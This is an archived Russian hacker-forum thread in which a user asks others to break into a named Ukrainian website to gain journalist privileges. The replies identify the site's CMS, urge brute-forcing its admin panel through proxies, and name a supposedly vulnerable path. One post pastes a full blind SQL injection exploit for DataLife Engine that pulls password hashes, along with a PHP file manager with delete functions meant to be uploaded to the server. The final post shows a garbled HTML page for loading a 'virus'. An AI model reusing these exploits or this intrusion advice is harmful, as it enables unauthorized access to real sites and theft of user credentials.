Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Кто сможет взломать сайт http://alive.org.ua/

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Для начинающих] >> Кто сможет взломать сайт http://alive.org.ua/
Имя
Сообщение << Старые топики   Новые топики >>
Кто сможет взломать сайт http://alive.org.ua/ - 2010-07-08 11:17:33.286666   
xsd55

Сообщений: 10
Оценки: 0
Присоединился: 2010-07-06 16:33:32.003333
Кто сможет взломать сайт http://alive.org.ua/ , сайт средне посещаемый но там дырка хоть как должна быть, кто сможеть взломать сайт пожалувства зделайте пользователя xsd55 журналистом
Post #: 1
RE: Кто сможет взломать сайт http://alive.org.ua/ - 2010-07-08 11:31:44.426666   
RE:Priest

Сообщений: 132
Оценки: 0
Присоединился: 2010-07-01 21:45:21.116666
Сайт работает на движке DLE (Datalife Engine), вот ссылка на первый, попавшийся мне эксплоит: http://www.xakep.ru/post/32363/exploit.txt

Уверен, что эта дырка уже прикрыта, но пусть будет тебе, как напутствие. Ищи в инете - эксплоиты должны быть.

Пробуй брутить админку, но обязательно через прокси-серверы, т.к. там стоит ограничение на кол-во неправильных комбинаций логин/пароль. 3 раза, если не ошибаюсь, затем выскакивает сообщение "Hacking Attempt!" и твой IP временно не допускается.

Вот адрес самой админки сайта: http://alive.org.ua/admin.php
Post #: 2
RE: Кто сможет взломать сайт http://alive.org.ua/ - 2010-07-08 11:45:04.170000   
xsd55

Сообщений: 10
Оценки: 0
Присоединился: 2010-07-06 16:33:32.003333
а где можно скачать рабочий брут ссылку в студию, а с ip  не проблема просто куки стирать и можно дальше
Post #: 3
RE: Кто сможет взломать сайт http://alive.org.ua/ - 2010-07-08 11:47:34.626666   
RE:Priest

Сообщений: 132
Оценки: 0
Присоединился: 2010-07-01 21:45:21.116666
Про кукисы насмешил. Тебе кто такую чепуху изволил поведать?
Куда тебе сайты ломать, если брут в инете найти не можешь?
Post #: 4
RE: Кто сможет взломать сайт http://alive.org.ua/ - 2010-07-08 11:52:18.176666   
xsd55

Сообщений: 10
Оценки: 0
Присоединился: 2010-07-06 16:33:32.003333
сам пробывал если пишет Hacking Attempt! просто стери куки и все, кстати я на этом же сайте и пробывал только пароль журналиста подбирал
Post #: 5
RE: Кто сможет взломать сайт http://alive.org.ua/ - 2010-07-08 12:02:57.503333   
skteam

Сообщений: 2
Оценки: 0
Присоединился: 2010-07-07 18:24:10.450000
вам в раздел работа и услуги
Post #: 6
RE: Кто сможет взломать сайт http://alive.org.ua/ - 2010-07-08 13:58:30.960000   
Antenwik

Сообщений: 43
Оценки: 0
Присоединился: 2010-06-28 16:26:25.486666
ппц. из-за одного журналиста,такую панику поднимать,сайтов полно, так что не теряй время!
Post #: 7
RE: Кто сможет взломать сайт http://alive.org.ua/ - 2011-07-13 06:52:36.633333   
impulsejkeee

Сообщений: 5
Оценки: 0
Присоединился: 2011-07-13 06:50:43.733333
На dle есть баг,его мало закрывают доступ к ФТП,www.Ваш сайт.ru/engine/images/php

если будет дыра в сайте,то создай сайт и воспользуйся дуркой
http://alive.org.ua/ скрипт в котором дырка/=http:// твой сайт с криптом/
Post #: 8
RE: Кто сможет взломать сайт http://alive.org.ua/ - 2011-07-13 06:58:22.796666   
impulsejkeee

Сообщений: 5
Оценки: 0
Присоединился: 2011-07-13 06:50:43.733333
можно залить на фтп такой скрипт

<?php
error_reporting (E_ERROR);
ini_set("max_execution_time",0);

echo '
+========================================+
| RST/GHC Datalife SQL injection exploit |
+========================================+
< > Lite Version for DLE <=4.1 < >
';

if ($argc < 2 ){
print " Usage: " . $argv[0] . " <host> <user> [table prefix]\n";
print " ex.: " . $argv[0] . " datalife.engine.net admin\n";
credits();
exit;
}

//DEFINE USER ID
$urla = 'http://' . $argv[1] . '/index.php?subaction=userinfo&user=' . $argv[2];
$result = file_get_contents($urla);
$str1 = 'user='; #index.php?do=pm&doaction=newpm&user=
$position = strpos($result, $str1);

if ($position === false){ print "\n\rSorry, no match found for user " . $argv[2]; credits();}
$str2 = '">';
$pos = strpos($result, $str2, $position);
$pos1 = $position+5;
$user_id = intval(substr($result, $pos1, $pos-$pos1));

print "Trying to get hash for password of user ". $argv[2] ." with id=" . $user_id . ":\n";

//SOME defines (aka CONFIG =))
if (empty($argv[3])){ $prefix = 'dle_';} #define prefix of the tables. try to find it yourself =) it is easy =)
else {$prefix = $argv[3];}
$min = 48; # 0
$max = 122; # z
if (check(">$min", 1) == 0 && check("<$max", 1) == 0) {print "\n Site is unvulnerable…"; credits();}
for ($sn=1; $sn <= 32; $sn++) {
blind($sn, $min, $max);
}
credits();


// REQUEST function
function check($crcheck, $sn)
{
global $argv, $user_id, $prefix;
$host = 'http://' . $argv[1] . '/index.php'; # argv[1] - host
$name = $argv[2]; #user name
$query = '?subaction=userinfo&user=' . $name .'%2527%20and%20ascii(substring((SELECT%20password%20FROM%20' . $prefix. 'users%20WHERE%20user_id='. $user_id .'),' . $sn . ',1))' .$crcheck . '/*'; #

$http = $host . $query;
#DEBUG
#print $http . "\n";
$result = file_get_contents($http);

// checking the answer
$string = ': '.$name.'</h2>'; #CORRECT it FOR your version, kids =)
#good idea is: 'do=pm&doaction=newpm&user='.$user_id;

if (eregi($string, $result)) { return 1; }

return 0;
}

//range function
function blind($sn, $fmin, $fmax)
{
if (($fmax-$fmin)<5) { if (crack($fmin, $fmax, $sn) == 0){print "\n\rEXPLOIT FAILED…"; credits();} return;}
$compare = intval($fmin + ($fmax-$fmin)/2);
$crcheck = ">". $compare;
if ( check($crcheck, $sn) == 1 ) {
blind($sn, $compare, $fmax);
}
else {
blind($sn, $fmin, $compare+1); }
}

//brute function
function crack($cmin, $cmax, $sn)
{
for ($i=$cmin; $i <=$cmax; $i++){
$crcheck = "=$i";
if (check($crcheck, $sn) == 1){print chr($i); return 1;}
}
return 0;
}


function credits(){
print "\n\n+========================================+\n\r Credits: 1dt.w0lf & foster \n\r Copyright © RST/GHC";
print "\n\r http://rst.void.ru && http://ghc.ru\n\r+========================================+\n";
exit;
}

?>
————————————————-
Через этот exploit можно зделать так,создать сайт (только не юкоз) в index.php засунуть exploit (или в другую сираницу).Можно воспользоваться таким скриптом
<?php //говорим что это PHP скрипт
function cmp( $a, $b ) //обьявляем функции
{
GLOBAL $sort; //сортируем полученные функции

if( $a->inode == $b->inode )
return 0;

switch( $sort ) //объявляем , что по каким функциям будет сортироваться
{
case "size":
return ($a->size > $b->size) ? -1 : 1;
case "type":
return strcmp($a->type, $b->type);
case "view":
return strcmp($a->view, $b->view);
case "atime":
return ($a->atime > $b->atime) ? -1 : 1;
case "ctime":
return ($a->ctime > $b->ctime) ? -1 : 1;
case "mtime":
return ($a->mtime > $b->mtime) ? -1 : 1;
case "group":
return strcmp($a->group, $b->group);
case "inode":
return ($a->inode > $b->inode) ? -1 : 1;
case "owner":
return strcmp($a->owner, $b->owner);
case "perms":
return ($a->perms > $b->perms) ? -1 : 1;
case "ext":
return strcmp($a->ext, $b->ext);
case "name":
default:
return 1;
}
}

function getIcons( $ext ) //объявляем функцию сопоставления иконки с типом файла
{
switch( $ext )
{
case "dir":
$file = "dir";
break;
case "link":
$file = "link";
break;
case "zip":
case "tgz":
case "gz":
case "Z":
$file = "compressed";
break;
case "gif":
case "jpg":
$file = "image2";
break;
case "dvi":
$file = "dvi";
break;
case "":
case "exe":
$file = "binary";
break;
case "sh":
case "php":
case "php3":
case "sql":
case "inc":
case "js":
$file = "sсriрt";
break;
case "txt":
$file = "text";
break;
case "HТМL":
case "sHТМL":
case "pHТМL":
$file = "world1";
break;
default:
$file = "generic";
break;
}

return $IMG="<IMG SRC='icons/".$file.".gif'>";
}

class MyFile { //объявляем какие данные будут получены
var $name;
var $path;
var $type;
var $ext;
var $stype;
var $sfile;
var $size;
var $file;
var $atime;
var $ctime;
var $mtime;
var $group;
var $inode;
var $owner;
var $perms;

function set( $filename, $path )
{
GLOBAL $cd; //объявляем функции перехода по каталогам

$this->name = $filename;
$this->path = $path;
$this->file = $this->path."/".$this->name;

$this->type = filetype( $this->file );
$this->size = filesize( $this->file );
$this->atime = fileatime( $this->file );
$this->ctime = filectime( $this->file );
$this->mtime = filemtime( $this->file );
$this->group = filegroup( $this->file );
$this->inode = fileinode( $this->file );
$this->owner = fileowner( $this->file );
$this->perms = fileperms( $this->file );

switch( $this->type )
{
case "link":
$this->sfile = readlink( $this->file );
$this->stype = filetype( $this->sfile );
$this->ext = "link";
break;
case "file":
$list = explode( ".", $this->name );
$nb = sizeof( $list );
if( $nb > 0 )
$this->stype = $list[$nb-1];
else
$this->stype = "???";

$this->ext = $this->stype;

switch( $this->stype )
{
case "gif":
case "GIF":
case "jpg":
case "JPG":
if( isset( $cd ) )
$pwd = $cd."/";
else
$pwd = "";

$this->sfile = "<IMG SRC='".$this->file."'>";
break;
default:
$this->sfile = $this->stype;
break;
}
break;
default:
$this->stype = "";
$this->sfile = "";
$this->ext = $this->type;
break;
}
}

function formatSize()
{
return number_format( $this->size, 0, ".", " ");
}
}

function genUrl( $ref, $args, $key = "", $val = "" )

{
$valist = "";

reset( $args );

if( $key != "" )
$args[ "$key" ] = $val;

if( !is_array( $args ) )
return $ref;

while( list( $key, $val ) = each( $args ) )
{
if( $val == "" )
continue;

if( $valist == "" )
$valist .= "?";
else
$valist .= "&";

$valist .= $key."=".$val;
}
return $ref.$valist;
}

function updir( $path )
{
$last = strrchr( $path, "/" );
$n1 = strlen( $last );
$n2 = strlen( $path );
return substr( $path, 0, $n2-$n1 );
}

$ref = "dir.php";

if( isset( $cd ) )
{
$path = $cd;
//$lcd = "?cd=$cd'";
$args[ "cd" ] = $cd;
}
else
{
$path = ".";
//$lcd = "";
$args[ "cd" ] = "";
}

if( isset( $nb ) )
{
for( $i = 0; $i < $nb; $i++ )
{
$var = "id_$i";
if( isset( $$var ) )
{
$file = $path."/".$$var;
if( is_file( $file ) || is_link( $file ) )
{
if( unlink( $file ) )
echo "<BR><b>$file</b> успешно удалён\n"; //сообщение об успешном удалении файла
else
echo "<BR>Не могу удалить выставите права доступа <b>$file</b>\n"; //сообщение о невозможности удалить файл который доступен только для чтения
}
elseif( is_dir( $file ) )
{
if( rmdir( $file ) )
echo "<BR><b>$file</b> успешно удалён\n"; //сообщение об успешном удалении
else
echo "<BR>файл недоступен для удаления<b>$file</b>\n"; //сообщение о невозможности удалить файл
}
}
}
}

$step = 100;

if( !isset( $sort ) )
$sort = "name";
else
$args[ "sort" ] = $sort;

if( !isset( $from ) )
$from = 0;
else
$args[ "from" ] = $from;

if( !isset( $to ) )
$to = $from + $step;

$d = dir($path);
echo "\n";
echo "<br><a href=$ref >Вернуться в начало</a>\n"; //ссылка на возврат в домашнею директорию скрипта
$updir = updir($d->path);
if( $updir != "." )
echo "<br>Подняться на директорию вверх; <a href=$ref?cd=$updir>$updir</a>\n"; //ссылка на директорию вверх
echo "<br>Открыть директорию: <a href=$ref?cd=".$d->path."/..>..</a>\n"; //обновление текущей директории
echo "<br>Текущая директория: <b>".$d->path."</b>\n"; //показываем путь до директории и файлов, которые в ней находятся

$n = 0;
while( $entry=$d->read() )
{
$lFiles[ $n ] = new MyFile;
$lFiles[ $n ]->set( $entry, $path );
$n++;
}

$d->close(); //создаём HТМL форму управления функциями
echo "<FORM NAME='del' METHOD='post' ACTION='".genUrl( $ref, $args )."'>\n";
echo "<TABLE BORDER=1>\n";
echo "<TR>\n";
echo "<TH>D</TH>\n";
//echo "<TH><a href='".genUrl( $ref, $args, "sort", "type" )."'>Type</a></TH>\n";
echo "<TH><a href='".genUrl( $ref, $args, "sort", "name" )."'>Имя</a></TH>\n";
echo "<TH><a href='".genUrl( $ref, $args, "sort", "size" )."'>Размер</a></TH>\n";
echo "<TH><a href='".genUrl( $ref, $args, "sort", "ext" )."'>Класс</a></TH>\n";
echo "<TH><a href='".genUrl( $ref, $args, "sort", "atime" )."'>В системе</a></TH>\n";
echo "<TH><a href='".genUrl( $ref, $args, "sort", "ctime" )."'>Создан</a></TH>\n";
echo "<TH><a href='".genUrl( $ref, $args, "sort", "mtime" )."'>Изменён</a></TH>\n";
echo "<TH><a href='".genUrl( $ref, $args, "sort", "perms" )."'>Размер</a></TH>\n";
echo "<TH><a href='".genUrl( $ref, $args, "sort", "group" )."'>Группа</a></TH>\n";
echo "<TH><a href='".genUrl( $ref, $args, "sort", "owner" )."'>ow</a></TH>\n";
echo "<TH><a href='".genUrl( $ref, $args, "sort", "inode" )."'>in</a></TH>\n";
echo "<TH>Показ</TH>\n";
echo "</TR>\n";

@usort( $lFiles, cmp );

for( $i = 0; $i < $n; $i++ )
{
if( ( $i < $from ) || ( $i >= $to ) )
continue;

$k = $i;
echo "<TR>\n";
echo "<TD><INPUT TYPE='checkbox' NAME='id_$k' VALUE='".
$lFiles[ $k ]->name
."'></TD>\n";

$IMG=getIcons( $lFiles[ $k ]->ext );

$dform = "M j y H:i";
// echo "<TD ALIGN=CENTER >".$lFiles[ $k ]->type."</TD>\n";
echo "<TD>$IMG".$lFiles[ $k ]->name."</TD>\n";
echo "<TD ALIGN=RIGHT >".$lFiles[ $k ]->formatSize()."</TD>\n";
echo "<TD>".$lFiles[ $k ]->ext ."</TD>\n";
echo "<TD>".date( $dform, $lFiles[ $k ]->atime )."</TD>\n";
echo "<TD>".date( $dform, $lFiles[ $k ]->ctime )."</TD>\n";
echo "<TD>".date( $dform, $lFiles[ $k ]->mtime )."</TD>\n";
echo "<TD>".$lFiles[ $k ]->perms."</TD>\n";
echo "<TD>".$lFiles[ $k ]->group."</TD>\n";
echo "<TD>".$lFiles[ $k ]->owner."</TD>\n";
echo "<TD>".$lFiles[ $k ]->inode."</TD>\n";

switch( $lFiles[ $k ]->type )
{
case "link":
if( $lFiles[ $k ]->stype == "dir" )
{
$tcd = $lFiles[ $k ]->path."/".$lFiles[ $k ]->name;
echo "<TD><a href='".
genUrl( $ref, $args, "cd", $tcd )."'>".
$lFiles[ $k ]->sfile."</a></TD>\n";
}
else
echo "<TD>".$lFiles[ $k ]->sfile."</TD>\n";
break;
case "dir":
$tcd = $lFiles[ $k ]->path."/".$lFiles[ $k ]->name;
echo "<TD><a href='".
genUrl( $ref, $args, "cd", $tcd )."'>".
$lFiles[ $k ]->name."</a></TD>\n";
break;
case "file":
echo "<TD>".$lFiles[ $k ]->sfile."</TD>\n";
break;
default:
echo "<TD>NO</TD>\n";
break;
}
echo "</TR>\n";
}

echo "</TABLE>\n";

$from = $from - $step;
if( isset( $cd ) )
{
echo "<INPUT TYPE='hidden' NAME='cd' VALUE='$cd'>\n";
}
echo "<INPUT TYPE='hidden' NAME='nb' VALUE='$n'>\n";

//echo "<br>from=$from;to=$to;n=$n\n";
echo "<br>\n";
if( $from >= 0 )
{
echo "<a href='".
genUrl( $ref, $args, "from", $from )."' >Предыдущий</a>/\n";
}
if( $to <= $n )
{
echo "<a href='".
genUrl( $ref, $args, "from", $to )."' >Далее</a> \n";
}
echo "<br>\n";
echo "<INPUT TYPE='submit' VALUE='Del'>\n";
echo "</FORM>\n";
?> //
Post #: 9
RE: Кто сможет взломать сайт http://alive.org.ua/ - 2011-07-13 07:09:47.833333   
impulsejkeee

Сообщений: 5
Оценки: 0
Присоединился: 2011-07-13 06:50:43.733333
quote:

ORIGINAL: RE:Priest

Сайт работает на движке DLE (Datalife Engine), вот ссылка на первый, попавшийся мне эксплоит: http://www.xakep.ru/post/32363/exploit.txt

Уверен, что эта дырка уже прикрыта, но пусть будет тебе, как напутствие. Ищи в инете - эксплоиты должны быть.

Пробуй брутить админку, но обязательно через прокси-серверы, т.к. там стоит ограничение на кол-во неправильных комбинаций логин/пароль. 3 раза, если не ошибаюсь, затем выскакивает сообщение "Hacking Attempt!" и твой IP временно не допускается.

Вот адрес самой админки сайта: http://alive.org.ua/admin.php

на dle много своих дыр и сама дыра которую не закрыли это http://alive.org.ua/engine/images.php ,если этот работать не будет в коде посмотри путь к шаблону.
На сайте надо зарегаться
Post #: 10
RE: Кто сможет взломать сайт http://alive.org.ua/ - 2011-07-13 10:50:22.493333   
jaconda

Сообщений: 61
Оценки: 0
Присоединился: 2011-05-22 23:50:40.183333
А какой язык программирования учат для взлома сайтов ?

Post #: 11
RE: Кто сможет взломать сайт http://alive.org.ua/ - 2011-07-13 13:35:02.513333   
impulsejkeee

Сообщений: 5
Оценки: 0
Присоединился: 2011-07-13 06:50:43.733333
quote:

ORIGINAL: jaconda

А какой язык программирования учат для взлома сайтов ?


На всех языках программирования.На своем сайте делоаешь страницу,там пишешь вирус,что бы вирус залить на сайт тебе надо сделать так :
!DOCTYPE HТМL PUBLIC "-//W3C//DTD XHТМL 1.0 Transitional//EN" "http://www.w3.org/TR/xHТМL1/DTD/xHТМL1-transitional.dtd">

<HТМL xmlns="http://www.w3.org/1999/xHТМL" xml:lang="en" lang="en">



<head>

<meta http-equiv="content-type" content="text/HТМL; charset=iso-8859-1" />

<meta name="author" content="" />



<sсriрt type="text/jаvаsсriрt" src="/Путь к вирусы на ява"></scrip



<title>Название станицы</title>

</head>
<bоdу>
</bоdу>
</HТМL>
Post #: 12
Страниц:  [1]
Все форумы >> [Для начинающих] >> Кто сможет взломать сайт http://alive.org.ua/







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.